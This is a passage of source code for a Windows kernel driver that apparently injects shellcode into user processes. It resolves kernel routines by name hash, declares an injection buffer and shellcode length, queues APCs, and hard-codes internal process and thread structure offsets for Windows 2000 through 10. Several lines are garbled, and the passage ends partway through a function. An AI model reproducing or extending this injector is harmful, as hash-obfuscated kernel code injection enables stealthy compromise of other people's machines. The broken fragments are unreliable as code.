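        if (b >= 'A' && b <= 'Z')
        {
            b = (unsigned char)(b + ('a' - 'A'));
        }
        if (a != b)
        {
            return -1;
        }
    }
    return 0;
}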
85 | #ifndef _WIN64
86 | char *__stdcall My_stristr(char *src,char *dest)
87 | #else
88 | char *__fastcall My_stristr(char *src,char *dest)
89 | #endif
90 | {
91 | int x_len;
92 | int i;
93 | int ret;
94 | char *src_tmp = src;
95 | char *dest_tmp = dest;
96 | x_len=my_strlen(dest_tmp);
97 | i=my_strlen(src_tmp);
98 |
99 | if(i= 'A' && *pTmp <= 'Z')
152 | {
153 | *pTmp = *pTmp - 0x20;
154 | }
155 | }
156 | return pSrc;
157 | }
--------------------------------------------------------------------------------
/DrvCfg.h:
--------------------------------------------------------------------------------
1 | #ifndef __DRV_CFG_H__
2 | #define __DRV_CFG_H__
3 |
4 | #include
5 | #include
6 | #include "KernelApi.h"
7 | #include
8 | #include
9 |
10 | #define MAX_THREAD_COUNT 64
11 |
12 | #define MAKEWORD(a, b) ((USHORT)(((BYTE)(((ULONG_PTR)(a)) & 0xff)) | ((USHORT)((BYTE)(((ULONG_PTR)(b)) & 0xff))) << 8))
13 | #define MAKELONG(a, b) ((LONG)(((USHORT)(((ULONG_PTR)(a)) & 0xffff)) | ((ULONG)((USHORT)(((ULONG_PTR)(b)) & 0xffff))) << 16))
14 | #define LOWORD(l) ((USHORT)(((ULONG_PTR)(l)) & 0xffff))
15 | #define HIWORD(l) ((USHORT)((((ULONG_PTR)(l)) >> 16) & 0xffff))
16 | #define LOBYTE(w) ((BYTE)(((ULONG_PTR)(w)) & 0xff))
17 | #define HIBYTE(w) ((BYTE)((((ULONG_PTR)(w)) >> 8) & 0xff))
18 |
19 | #pragma pack(1)
/*
 * One entry of a PE base-relocation block: a 12-bit offset within the
 * block's page and a 4-bit relocation type, packed into one USHORT
 * (byte-packed by the pragma pack(1) above).
 */
typedef struct _IMAGE_RELOC
{
    USHORT Offset:12;   /* offset from the relocation block's page RVA */
    USHORT Type:4;      /* IMAGE_REL_BASED_* type */
}IMAGE_RELOC,*PIMAGE_RELOC;
/*
 * Table of kernel routine pointers and the name hashes used to locate them.
 *
 * Every entry is a (typed function pointer, ULONG hash) pair. The hash is
 * presumably the CalcHashValue() form of the export name (the resolver,
 * Get_Kernel_Api_From_HashValue in x86Call.c, is not visible on this page)
 * and the pointer is filled in at run time. The struct is byte-packed
 * (pragma pack(1) above) so the pairs can be walked as a flat sequence; the
 * trailing ulEndApiSaveAddress / ulEndApiHashValue pair looks like the end
 * marker of such a walk — confirm in the resolver.
 *
 * Commented-out entries are absent from the layout; re-adding one shifts
 * every field after it.
 */
typedef struct _FUNCTION_DAT
{
    PSSETLOADIMAGENOTIFYROUTINE My_PsSetLoadImageNotifyRoutine;
    ULONG My_PsSetLoadImageNotifyRoutine_HashValue;

    //ULONG_PTR My_ZwCreateFile;
    //ULONG My_ZwCreateFile_HashValue;

    //ULONG_PTR My_ZwWriteFile;
    //ULONG My_ZwWriteFile_HashValue;
    PSSETCREATEPROCESSNOTIFYROUTINE My_PsSetCreateProcessNotifyRoutine;
    ULONG My_PsSetCreateProcessNotifyRoutine_HashValue;

    ZWCLOSE My_ZwClose;
    ULONG My_ZwClose_HashValue;

    ZWQUERYSYSTEMINFORMATION My_ZwQuerySystemInformation;
    ULONG My_ZwQuerySystemInformation_HashValue;

    EXALLOCATEPOOLWITHTAG My_ExAllocatePoolWithTag;
    ULONG My_ExAllocatePoolWithTag_HashValue;

    EXFREEPOOLWITHTAG My_ExFreePoolWithTag;
    ULONG My_ExFreePoolWithTag_HashValue;

    OBREFERENCEOBJECTBYHANDLE My_ObReferenceObjectByHandle;
    ULONG My_ObReferenceObjectByHandle_HashValue;

    OBDEREFERENCEOBJECT My_ObDereferenceObject;
    ULONG My_ObDereferenceObject_HashValue;

    PSCREATESYSTEMTHREAD My_PsCreateSystemThread;
    ULONG My_PsCreateSystemThread_HashValue;

    KEWAITFORSINGLEOBJECT My_KeWaitForSingleObject;
    ULONG My_KeWaitForSingleObject_HashValue;

    PSTERMINATESYSTEMTHREAD My_PsTerminateSystemThread;
    ULONG My_PsTerminateSystemThread_HashValue;

    MMCREATEMDL My_MmCreateMdl;
    ULONG My_MmCreateMdl_HashValue;

    MMBUILDMDLFORNONPAGEDPOOL My_MmBuildMdlForNonPagedPool;
    ULONG My_MmBuildMdlForNonPagedPool_HashValue;

    MMMAPLOCKEDPAGES My_MmMapLockedPages;
    ULONG My_MmMapLockedPages_HashValue;

    MMUNMAPLOCKEDPAGES My_MmUnmapLockedPages;
    ULONG My_MmUnmapLockedPages_HashValue;

    PSGETCURRENTPROCESS My_PsGetCurrentProcess;
    ULONG My_PsGetCurrentProcess_HashValue;

    IOGETCURRENTPROCESS My_IoGetCurrentProcess;
    ULONG My_IoGetCurrentProcess_HashValue;

    KESTACKATTACHPROCESS My_KeStackAttachProcess;
    ULONG My_KeStackAttachProcess_HashValue;

    ZWALLOCATEVIRTUALMEMORY My_ZwAllocateVirtualMemory;
    ULONG My_ZwAllocateVirtualMemory_HashValue;

    KEUNSTACKDETACHPROCESS My_KeUnstackDetachProcess;
    ULONG My_KeUnstackDetachProcess_HashValue;

    PSLOOKUPPROCESSBYPROCESSID My_PsLookupProcessByProcessId;
    ULONG My_PsLookupProcessByProcessId_HashValue;

    KEINITIALIZEAPC My_KeInitializeApc;
    ULONG My_KeInitializeApc_HashValue;

    KEINSERTQUEUEAPC My_KeInsertQueueApc;
    ULONG My_KeInsertQueueApc_HashValue;

    KEGETCURRENTTHREAD My_KeGetCurrentThread;
    ULONG My_KeGetCurrentThread_HashValue;

    PSGETPROCESSIMAGEFILENAME My_PsGetProcessImageFileName;
    ULONG My_PsGetProcessImageFileName_HashValue;

    PSREMOVELOADIMAGENOTIFYROUTINE My_PsRemoveLoadImageNotifyRoutine;
    ULONG My_PsRemoveLoadImageNotifyRoutine_HashValue;

    PSGETVERSION My_PsGetVersion;
    /* sic: "Verion" — the misspelling is part of the field name; rename only together with every user. */
    ULONG My_PsGetVerion_HashValue;

    MMISADDRESSVALID My_MmIsAddressValid;
    ULONG My_MmIsAddressValid_HashValue;

    OBOPENOBJECTBYPOINTER My_ObOpenObjectByPointer;
    ULONG My_ObOpenObjectByPointer_HashValue;

    ZWQUERYINFORMATIONTHREAD My_ZwQueryInformationThread;
    ULONG My_ZwQueryInformationThread_HashValue;

    ZWQUERYINFORMATIONPROCESS My_ZwQueryInformationProcess;
    ULONG My_ZwQueryInformationProcess_HashValue;

    /* NOTE(review): declared with the PsLookupProcessByProcessId typedef, but
     * PsLookupThreadByThreadId returns a thread object, so the out-parameter
     * type of this pointer is likely wrong — check the typedef in KernelApi.h. */
    PSLOOKUPPROCESSBYPROCESSID My_PsLookupThreadByThreadId;
    ULONG My_PsLookupThreadByThreadId_HashValue;

    IOTHREADTOPROCESS My_IoThreadToProcess;
    ULONG My_IoThreadToProcess_HashValue;

    IOALLOCATEMDL My_IoAllocateMdl;
    ULONG My_IoAllocateMdl_HashValue;

    MMPROBEANDLOCKPAGES My_MmProbeAndLockPages;
    ULONG My_MmProbeAndLockPages_HashValue;

    MMMAPLOCKEDPAGESSPECIFYCACHE My_MmMapLockedPagesSpecifyCache;
    ULONG My_MmMapLockedPagesSpecifyCache_HashValue;

    MMUNLOCKPAGES My_MmUnlockPages;
    ULONG My_MmUnlockPages_HashValue;

    IOFREEMDL My_IoFreeMdl;
    ULONG My_IoFreeMdl_HashValue;

    KEBUGCHECKEX My_KeBugCheckEx;
    ULONG My_KeBugCheckEx_HashValue;

    MMGETSYSTEMROUTINEADDRESS My_MmGetSystemRoutineAddress;
    ULONG My_MmGetSystemRoutineAddress_HashValue;

    RTLINITUNICODESTRING My_RtlInitUnicodeString;
    ULONG My_RtlInitUnicodeString_HashValue;

    RTLDECOMPRESSBUFFER My_RtlDecompressBuffer;
    ULONG My_RtlDecompressBuffer_HashValue;

    //WCSSTR My_Wcsstr;
    //ULONG My_Wcsstr_HashValue;


    /* Trailing pair; presumably the terminator for a walk over the table. */
    ULONG_PTR ulEndApiSaveAddress;
    ULONG ulEndApiHashValue;
}FUNCTION_DAT,*PFUNCTION_DAT;
165 | #pragma pack()
166 |
167 | NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj,PUNICODE_STRING pUniRegister);
168 |
169 | extern PFUNCTION_DAT g_pFunctionDat;
170 | //extern ULONG_PTR *g_ulNtoskrnlBase;
171 | extern BOOLEAN g_bInjectProcessFlag;
172 | extern PVOID g_pInjectBuffer;
173 | extern ULONG g_ulInjectShellCodeLength;
174 | //extern PVOID g_pInjectShellCode;
175 | extern KEDELAYEXECUTIONTHREAD g_KeDelayExecutionThread;
176 | #ifndef _WIN64
177 | extern KEQUERYSYSTEMTIME g_KeQuerySystemTime;
178 | #endif
179 | extern EXSYSTEMTIMETOLOCALTIME g_ExSystemTimeToLocalTime;
180 |
181 | #endif
--------------------------------------------------------------------------------
/InitializeInjectRelevantInfo.c:
--------------------------------------------------------------------------------
1 | #include "DrvCfg.h"
2 | #include "KernelApi.h"
3 | #include "Utils.h"
4 | #include "InitializeInjectRelevantInfo.h"
5 |
/* The single global offset table. Zero-initialised here; presumably filled
 * by one of the InitializeWindows* routines below once the kernel version
 * is known (the call that does so is not on this page). */
INJECT_RELEVANT_OFFSET g_InjectRelevantOffset = {0};
7 |
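/*
 * Report whether pCurProcess has a WoW64 context.
 *
 * Opens a kernel handle to the process object, queries
 * ProcessWow64Information through the hash-resolved API table, closes the
 * handle and returns:
 *   0x64   ProcessWow64Information is non-zero (WoW64 process)
 *   0x86   it is zero
 *   any NT error status from ObOpenObjectByPointer / ZwQueryInformationProcess
 * 0x64 and 0x86 are not NTSTATUS codes; callers compare against them
 * directly (see InitializeWindows7). The NT_ERROR checks match the rest of
 * this module and let warning-severity statuses through.
 *
 * NOTE(review): the only visible caller passes the current process at
 * initialisation time; if that runs in the System process the answer is
 * always 0x86 and the 64-bit offset branches are unreachable — confirm the
 * intended caller.
 * NOTE(review): PROCESS_ALL_ACCESS is far more than this query needs; a
 * query-only access mask would follow least privilege.
 *
 * Fix: the process handle was never closed on any path (kernel handle
 * leak on every call), and the trailing `return Status;` was unreachable.
 */
NTSTATUS IsWindows64Bits(PVOID pCurProcess)
{
    NTSTATUS Status;
    HANDLE hProcess;
    ULONG_PTR ulIsWow64Process;
    ULONG ulRetLength;

    hProcess = NULL;
    ulIsWow64Process = 0;
    ulRetLength = 0;

    Status = g_pFunctionDat->My_ObOpenObjectByPointer(pCurProcess,OBJ_KERNEL_HANDLE,NULL,PROCESS_ALL_ACCESS,NULL,KernelMode,&hProcess);
    if (NT_ERROR(Status))
    {
        return Status;
    }
    Status = g_pFunctionDat->My_ZwQueryInformationProcess(hProcess,ProcessWow64Information,&ulIsWow64Process,sizeof(ULONG_PTR),&ulRetLength);
    /* The handle is only needed for the query; release it on every path. */
    g_pFunctionDat->My_ZwClose(hProcess);
    if (NT_ERROR(Status))
    {
        return Status;
    }
    return ulIsWow64Process ? 0x64 : 0x86;
}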
/*
 * Fill the offset table for Windows 2000 (32-bit only).
 *
 * Returns FALSE when no table is supplied, TRUE otherwise.
 *
 * Only ulOffsetName (0x01FC), ulOffsetAlertable (0x0158) and ulOffsetApcState
 * (0x0034) carry real values; every other process/thread offset is written
 * as 0x00, and the TEB/PEB-related fields are not written at all.
 * NOTE(review): this looks like an unfinished table — a walk using the
 * zero offsets would read the start of the object instead of the intended
 * field. Confirm before enabling this path.
 */
BOOLEAN InitializeWindows2k(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
{
    PINJECT_RELEVANT_OFFSET tbl = pInjectRelevantOffset;

    if (!tbl)
    {
        return FALSE;
    }

    tbl->WindowsVersion.bIsWindows2000 = TRUE;
    tbl->WindowsVersion.bIs64Bit = FALSE;

    /* Process */
    tbl->ulOffsetName = 0x01FC;
    tbl->ulOffsetPeb = 0x00;
    tbl->ulOffsetFlink = 0x00;
    tbl->ulOffsetThreadListHead = 0x00;
    tbl->ulOffsetPid = 0x00;

    /* Thread */
    tbl->ulOffsetAlertable = 0x0158;
    tbl->ulOffsetApcState = 0x0034;
    tbl->ulOffsetSuspendCount = 0x00;
    tbl->ulOffsetCrossThreadFlags = 0x00;
    tbl->ulOffsetCid = 0x00;
    tbl->ulOffsetTrapFrame = 0x00;
    tbl->ulOffsetThreadListEntry = 0x00;

    return TRUE;
}
/*
 * Fill the offset table for Windows XP (32-bit only).
 *
 * Returns FALSE when no table is supplied, TRUE otherwise.
 *
 * This is the most complete of the visible tables: process, thread, PEB
 * and TEB offsets are all written. ulOffsetResv and ulOffsetAlerted are
 * left untouched (only the Windows 7 table sets ulOffsetAlerted).
 * The values are specific to this kernel build and are not validated.
 */
BOOLEAN InitializeWindowsXp(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
{
    PINJECT_RELEVANT_OFFSET tbl = pInjectRelevantOffset;

    if (!tbl)
    {
        return FALSE;
    }

    tbl->WindowsVersion.bIsWindowsXp = TRUE;
    tbl->WindowsVersion.bIs64Bit = FALSE;

    /* Process */
    tbl->ulOffsetPid = 0x84;
    tbl->ulOffsetFlink = 0x88;
    tbl->ulOffsetName = 0x174;
    tbl->ulOffsetThreadListHead = 0x190;
    tbl->ulOffsetPeb = 0x1B0;

    /* Thread */
    tbl->ulOffsetTeb = 0x20;
    tbl->ulOffsetApcState = 0x0034;
    tbl->ulOffsetTrapFrame = 0x134;
    tbl->ulOffsetAlertable = 0x0164;
    tbl->ulOffsetSuspendCount = 0x1b9;
    tbl->ulOffsetCid = 0x1ec;
    tbl->ulOffsetThreadListEntry = 0x22c;
    tbl->ulOffsetCrossThreadFlags = 0x248;

    /* PEB */
    tbl->ulOffsetPebLdr = 0x0c;
    tbl->ulOffsetPebModuleListEntry = 0x0c;

    /* TEB */
    tbl->ulOffsetActivationContextStackPointer = 0x1A8;

    return TRUE;
}
/*
 * Fill the offset table for Windows Server 2003 (32-bit only).
 *
 * Returns FALSE when no table is supplied, TRUE otherwise.
 *
 * Only ulOffsetTeb (0x20), ulOffsetAlertable (0x0154), ulOffsetApcState
 * (0x0034), the two PEB offsets (0x0c) and the TEB activation-context offset
 * (0x1A8) carry real values; every other process/thread offset is written
 * as 0x00.
 * NOTE(review): as with the Windows 2000 table this looks unfinished —
 * confirm the zero entries before enabling this path.
 */
BOOLEAN InitializeWindows2003(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
{
    PINJECT_RELEVANT_OFFSET tbl = pInjectRelevantOffset;

    if (!tbl)
    {
        return FALSE;
    }

    tbl->WindowsVersion.bIsWindows2003 = TRUE;
    tbl->WindowsVersion.bIs64Bit = FALSE;

    /* Process: all placeholders */
    tbl->ulOffsetPeb = 0x00;
    tbl->ulOffsetName = 0x00;
    tbl->ulOffsetFlink = 0x00;
    tbl->ulOffsetThreadListHead = 0x00;
    tbl->ulOffsetPid = 0x00;

    /* Thread */
    tbl->ulOffsetTeb = 0x20;
    tbl->ulOffsetApcState = 0x0034;
    tbl->ulOffsetAlertable = 0x0154;
    tbl->ulOffsetSuspendCount = 0x00;
    tbl->ulOffsetCrossThreadFlags = 0x00;
    tbl->ulOffsetCid = 0x00;
    tbl->ulOffsetTrapFrame = 0x00;
    tbl->ulOffsetThreadListEntry = 0x00;

    /* PEB */
    tbl->ulOffsetPebLdr = 0x0c;
    tbl->ulOffsetPebModuleListEntry = 0x0c;

    /* TEB */
    tbl->ulOffsetActivationContextStackPointer = 0x1A8;

    return TRUE;
}
/*
 * Fill the offset table for Windows 7 (the 6.1 branch of the version
 * dispatch), choosing the 32- or 64-bit layout from what IsWindows64Bits()
 * reports for the current process.
 *
 * pInjectRelevantOffset: table to populate; must not be NULL.
 * Returns TRUE when a layout was selected, FALSE for a NULL pointer or an
 * error status, and otherwise the raw status value (see the first note).
 *
 * NOTE(review): the return type is NTSTATUS, yet success is signalled with
 * the BOOLEAN TRUE and the unrecognised-answer path leaks IsWindows64Bits()'s
 * raw status. The caller compares the result with TRUE, so any leaked value
 * other than 1 is treated as failure there; returning FALSE explicitly on
 * that path would make the contract honest.
 * NOTE(review): IsWindows64Bits() is not visible in this file. 0x86 and 0x64
 * are assumed to be its "32-bit" / "64-bit" answers because every NT6+
 * initializer here tests exactly those two values — confirm against its
 * definition.
 * NOTE(review): the offsets are hard-coded per build family and never
 * validated against the running kernel; a layout mismatch is not detected
 * here.
 */
NTSTATUS InitializeWindows7(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
{
    PINJECT_RELEVANT_OFFSET off = pInjectRelevantOffset;
    NTSTATUS Status;

    if (!off)
    {
        return FALSE;
    }
    off->WindowsVersion.bIsWindows7 = TRUE;

    Status = IsWindows64Bits(g_pFunctionDat->My_IoGetCurrentProcess());
    switch (Status)
    {
    case 0x86: /* 32-bit layout */
        off->WindowsVersion.bIs64Bit = FALSE;
        off->ulOffsetPeb = 0x01a8;
        off->ulOffsetName = 0x016c;
        off->ulOffsetFlink = 0x00b8;
        off->ulOffsetThreadListHead = 0x188;
        off->ulOffsetPid = 0xB4;
        off->ulOffsetSuspendCount = 0x188;
        off->ulOffsetCrossThreadFlags = 0x280;
        off->ulOffsetCid = 0x22c;
        off->ulOffsetTrapFrame = 0x128;
        off->ulOffsetThreadListEntry = 0x268;
        off->ulOffsetTeb = 0x88;
        off->ulOffsetAlerted = 0x3A;
        off->ulOffsetAlertable = 0x3C;
        off->ulOffsetApcState = 0x40;
        off->ulOffsetPebLdr = 0x0c;
        off->ulOffsetPebModuleListEntry = 0x0c;
        off->ulOffsetActivationContextStackPointer = 0x1A8;
        return TRUE;

    case 0x64: /* 64-bit layout; the "+ 0x08" terms are kept as the author wrote them */
        off->WindowsVersion.bIs64Bit = TRUE;
        off->ulOffsetPeb = 0x330 + 0x08;
        off->ulOffsetName = 0x2d8 + 0x08;
        off->ulOffsetFlink = 0x188;
        off->ulOffsetThreadListHead = 0x30;
        off->ulOffsetPid = 0x180;
        off->ulOffsetSuspendCount = 0x26c;
        off->ulOffsetCrossThreadFlags = 0x448;
        off->ulOffsetCid = 0x3b0;
        off->ulOffsetTrapFrame = 0x1d8;
        off->ulOffsetThreadListEntry = 0x2f8;
        off->ulOffsetTeb = 0x0b8;
        off->ulOffsetAlerted = 0x4A;
        off->ulOffsetAlertable = 0x4C;
        off->ulOffsetApcState = 0x50;
        off->ulOffsetPebLdr = 0x18;
        off->ulOffsetPebModuleListEntry = 0x10;
        off->ulOffsetActivationContextStackPointer = 0x2c8;
        return TRUE;

    default:
        /* Neither recognised answer: fall through to the status checks. */
        break;
    }

    if (NT_ERROR(Status))
    {
        return FALSE;
    }
    return Status;
}
/*
 * Fill the offset table for Windows 8.1 (the 6.3 branch of the version
 * dispatch), choosing the 32- or 64-bit layout from what IsWindows64Bits()
 * reports for the current process.
 *
 * pInjectRelevantOffset: table to populate; must not be NULL.
 * Returns TRUE when a layout was selected, FALSE for a NULL pointer or an
 * error status, and otherwise the raw status value (same NTSTATUS/BOOLEAN
 * mix as InitializeWindows7; the caller tests the result against TRUE).
 *
 * NOTE(review): the 64-bit case does not assign ulOffsetTeb, ulOffsetPebLdr,
 * ulOffsetPebModuleListEntry or ulOffsetActivationContextStackPointer, so on
 * x64 they keep whatever the caller zeroed them to. A consumer that applies
 * a zero offset reads the object base itself — confirm whether those fields
 * are used on the x64 path.
 * NOTE(review): 0x86 / 0x64 are assumed to be IsWindows64Bits()'s
 * "32-bit" / "64-bit" answers (not visible here); the offsets themselves are
 * hard-coded and never validated against the running kernel.
 */
NTSTATUS InitializeWindows8_1(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
{
    PINJECT_RELEVANT_OFFSET off = pInjectRelevantOffset;
    NTSTATUS Status;

    if (!off)
    {
        return FALSE;
    }
    off->WindowsVersion.bIsWindows81 = TRUE;

    Status = IsWindows64Bits(g_pFunctionDat->My_IoGetCurrentProcess());
    switch (Status)
    {
    case 0x86: /* 32-bit layout */
        off->WindowsVersion.bIs64Bit = FALSE;
        off->ulOffsetPeb = 0x140;
        off->ulOffsetName = 0x170;
        off->ulOffsetFlink = 0x0b8;
        off->ulOffsetThreadListHead = 0x194;
        off->ulOffsetPid = 0xB4;
        off->ulOffsetSuspendCount = 0x18c;
        off->ulOffsetCrossThreadFlags = 0x3b8;
        off->ulOffsetCid = 0x364;
        off->ulOffsetTrapFrame = 0x06c;
        off->ulOffsetThreadListEntry = 0x39c;
        off->ulOffsetTeb = 0xa8;
        off->ulOffsetAlerted = 0x56;
        off->ulOffsetAlertable = 0x58;
        off->ulOffsetApcState = 0x70;
        off->ulOffsetPebLdr = 0x0c;
        off->ulOffsetPebModuleListEntry = 0x0c;
        off->ulOffsetActivationContextStackPointer = 0x1A8;
        return TRUE;

    case 0x64: /* 64-bit layout (fewer fields; see the note above) */
        off->WindowsVersion.bIs64Bit = TRUE;
        off->ulOffsetPeb = 0x330;
        off->ulOffsetName = 0x2d8;
        off->ulOffsetFlink = 0x188;
        off->ulOffsetThreadListHead = 0x300;
        off->ulOffsetPid = 0x180;
        off->ulOffsetSuspendCount = 0x26c;
        off->ulOffsetCrossThreadFlags = 0x448;
        off->ulOffsetCid = 0x3b0;
        off->ulOffsetTrapFrame = 0x1d8;
        off->ulOffsetThreadListEntry = 0x030;
        off->ulOffsetAlerted = 0x72;
        off->ulOffsetAlertable = 0x74;
        off->ulOffsetApcState = 0x98;
        return TRUE;

    default:
        /* Neither recognised answer: fall through to the status checks. */
        break;
    }

    if (NT_ERROR(Status))
    {
        return FALSE;
    }
    return Status;
}
/*
 * Fill the offset table for Windows 8 (the 6.2 branch of the version
 * dispatch), choosing the 32- or 64-bit layout from what IsWindows64Bits()
 * reports for the current process.
 *
 * pInjectRelevantOffset: table to populate; must not be NULL.
 * Returns TRUE when a layout was selected, FALSE for a NULL pointer or an
 * error status, and otherwise the raw status value (same NTSTATUS/BOOLEAN
 * mix as InitializeWindows7; the caller tests the result against TRUE).
 *
 * NOTE(review): the 64-bit case is identical to the one in
 * InitializeWindows8_1 and, like it, leaves ulOffsetTeb, ulOffsetPebLdr,
 * ulOffsetPebModuleListEntry and ulOffsetActivationContextStackPointer
 * unassigned (zero from the caller). Confirm whether the x64 path uses them.
 * NOTE(review): 0x86 / 0x64 are assumed to be IsWindows64Bits()'s
 * "32-bit" / "64-bit" answers (not visible here); the offsets themselves are
 * hard-coded and never validated against the running kernel.
 */
NTSTATUS InitializeWindows8(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
{
    PINJECT_RELEVANT_OFFSET off = pInjectRelevantOffset;
    NTSTATUS Status;

    if (!off)
    {
        return FALSE;
    }
    off->WindowsVersion.bIsWindows8 = TRUE;

    Status = IsWindows64Bits(g_pFunctionDat->My_IoGetCurrentProcess());
    switch (Status)
    {
    case 0x86: /* 32-bit layout */
        off->WindowsVersion.bIs64Bit = FALSE;
        off->ulOffsetPeb = 0x140;
        off->ulOffsetName = 0x170;
        off->ulOffsetFlink = 0x0b8;
        off->ulOffsetThreadListHead = 0x194;
        off->ulOffsetPid = 0xB4;
        off->ulOffsetSuspendCount = 0x18c;
        off->ulOffsetCrossThreadFlags = 0x268;
        off->ulOffsetCid = 0x214;
        off->ulOffsetTrapFrame = 0x06c;
        off->ulOffsetThreadListEntry = 0x24c;
        off->ulOffsetTeb = 0xa8;
        off->ulOffsetAlerted = 0x56;
        off->ulOffsetAlertable = 0x58;
        off->ulOffsetApcState = 0x70;
        off->ulOffsetPebLdr = 0x0c;
        off->ulOffsetPebModuleListEntry = 0x0c;
        off->ulOffsetActivationContextStackPointer = 0x1A8;
        return TRUE;

    case 0x64: /* 64-bit layout (fewer fields; see the note above) */
        off->WindowsVersion.bIs64Bit = TRUE;
        off->ulOffsetPeb = 0x330;
        off->ulOffsetName = 0x2d8;
        off->ulOffsetFlink = 0x188;
        off->ulOffsetThreadListHead = 0x300;
        off->ulOffsetPid = 0x180;
        off->ulOffsetSuspendCount = 0x26c;
        off->ulOffsetCrossThreadFlags = 0x448;
        off->ulOffsetCid = 0x3b0;
        off->ulOffsetTrapFrame = 0x1d8;
        off->ulOffsetThreadListEntry = 0x030;
        off->ulOffsetAlerted = 0x72;
        off->ulOffsetAlertable = 0x74;
        off->ulOffsetApcState = 0x98;
        return TRUE;

    default:
        /* Neither recognised answer: fall through to the status checks. */
        break;
    }

    if (NT_ERROR(Status))
    {
        return FALSE;
    }
    return Status;
}
/*
 * Fill the offset table for Windows 10 (the 10.0 branch of the version
 * dispatch), choosing the 32- or 64-bit layout from what IsWindows64Bits()
 * reports for the current process.
 *
 * pInjectRelevantOffset: table to populate; must not be NULL.
 * Returns TRUE when a layout was selected, FALSE for a NULL pointer or an
 * error status, and otherwise the raw status value (same NTSTATUS/BOOLEAN
 * mix as InitializeWindows7; the caller tests the result against TRUE).
 *
 * NOTE(review): this table is thinner than the Windows 8 / 8.1 ones. The
 * 32-bit case never assigns ulOffsetAlerted, ulOffsetAlertable or
 * ulOffsetApcState, and the 64-bit case additionally leaves ulOffsetTeb,
 * ulOffsetPebLdr, ulOffsetPebModuleListEntry and
 * ulOffsetActivationContextStackPointer unassigned. All of them stay at the
 * caller's zero; a consumer applying a zero offset reads the object base
 * itself — confirm which of these fields the Windows 10 path relies on.
 * NOTE(review): one table is used for every 10.0 build; the build number is
 * never consulted, so layout changes between builds are not detected here.
 */
NTSTATUS InitializeWindows10(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
{
    PINJECT_RELEVANT_OFFSET off = pInjectRelevantOffset;
    NTSTATUS Status;

    if (!off)
    {
        return FALSE;
    }
    off->WindowsVersion.bIsWindows10 = TRUE;

    Status = IsWindows64Bits(g_pFunctionDat->My_IoGetCurrentProcess());
    switch (Status)
    {
    case 0x86: /* 32-bit layout */
        off->WindowsVersion.bIs64Bit = FALSE;
        off->ulOffsetPeb = 0x144;
        off->ulOffsetName = 0x174;
        off->ulOffsetFlink = 0x0b8;
        off->ulOffsetThreadListHead = 0x198;
        off->ulOffsetPid = 0xB4;
        off->ulOffsetSuspendCount = 0x18c;
        off->ulOffsetCrossThreadFlags = 0x3c8;
        off->ulOffsetCid = 0x374;
        off->ulOffsetTrapFrame = 0x06c;
        off->ulOffsetThreadListEntry = 0x3ac;
        off->ulOffsetTeb = 0xa8;
        off->ulOffsetPebLdr = 0x0c;
        off->ulOffsetPebModuleListEntry = 0x0c;
        off->ulOffsetActivationContextStackPointer = 0x1A8;
        return TRUE;

    case 0x64: /* 64-bit layout (fewer fields; see the note above) */
        off->WindowsVersion.bIs64Bit = TRUE;
        off->ulOffsetPeb = 0x330;
        off->ulOffsetName = 0x2d8;
        off->ulOffsetFlink = 0x188;
        off->ulOffsetThreadListHead = 0x300;
        off->ulOffsetPid = 0x180;
        off->ulOffsetSuspendCount = 0x26c;
        off->ulOffsetCrossThreadFlags = 0x448;
        off->ulOffsetCid = 0x3b0;
        off->ulOffsetTrapFrame = 0x1d8;
        off->ulOffsetThreadListEntry = 0x030;
        return TRUE;

    default:
        /* Neither recognised answer: fall through to the status checks. */
        break;
    }

    if (NT_ERROR(Status))
    {
        return FALSE;
    }
    return Status;
}
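/*
 * Detect the running Windows version and populate the offset table for it.
 *
 * pInjectRelevantOffset: table to populate. The whole structure is zeroed
 *   first, so any field a per-version initializer does not assign is 0 on
 *   return.
 * Returns TRUE when a per-version initializer reported success, FALSE when
 * the pointer is NULL, when the version is recognised but has no offset
 * table (Vista / 6.0 and NT 4.0), or when the version is not recognised.
 *
 * Fix relative to the original: the NULL check now happens before CleanZero,
 * which previously dereferenced the pointer unconditionally even though every
 * per-version initializer rejects NULL. The empty Vista/NT4 branches (whose
 * only content was commented-out DbgPrint calls) are collapsed into explicit
 * "unsupported" returns with the same result.
 *
 * NOTE(review): dispatch keys on Major.Minor only. The build number is
 * fetched but never used to pick a layout, so every build of one family gets
 * the same hard-coded offsets; a layout change between builds is invisible
 * here and shows up later as reads of the wrong bytes.
 * NOTE(review): My_PsGetVersion's BOOLEAN result is ignored. That matches the
 * PSGETVERSION typedef in KernelApi.h — PsGetVersion's return flags a checked
 * build rather than an error — but the out-parameters are used unchecked.
 * The argument SystemVersion.unStrCSDVersion is passed without '&', so it is
 * presumably already a PUNICODE_STRING (NULL after CleanZero) — confirm
 * against the SYSTEM_VERSION definition.
 */
BOOLEAN InitializeInjectInformation(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
{
    SYSTEM_VERSION SystemVersion;

    /* Same guard the per-version initializers apply, but here it must come
     * before CleanZero would dereference the pointer. */
    if (NULL == pInjectRelevantOffset)
    {
        return FALSE;
    }

    CleanZero((PUCHAR)pInjectRelevantOffset,sizeof(INJECT_RELEVANT_OFFSET));
    CleanZero((PUCHAR)&SystemVersion,sizeof(SYSTEM_VERSION));
    g_pFunctionDat->My_PsGetVersion(&SystemVersion.ulMajorVersion,
                                    &SystemVersion.ulMinorVersion,
                                    &SystemVersion.ulBuildNumber,
                                    SystemVersion.unStrCSDVersion);

    /* The NT6+ initializers are declared NTSTATUS but signal success with the
     * BOOLEAN TRUE and may leak another status on an unrecognised bitness
     * answer, so the test has to stay "== TRUE" rather than "!= 0". */
    if (SystemVersion.ulMajorVersion == 0x0A && SystemVersion.ulMinorVersion == 0)
    {
        return (BOOLEAN)(InitializeWindows10(pInjectRelevantOffset) == TRUE);
    }
    if (SystemVersion.ulMajorVersion == 6 && SystemVersion.ulMinorVersion == 3)
    {
        return (BOOLEAN)(InitializeWindows8_1(pInjectRelevantOffset) == TRUE);
    }
    if (SystemVersion.ulMajorVersion == 6 && SystemVersion.ulMinorVersion == 2)
    {
        return (BOOLEAN)(InitializeWindows8(pInjectRelevantOffset) == TRUE);
    }
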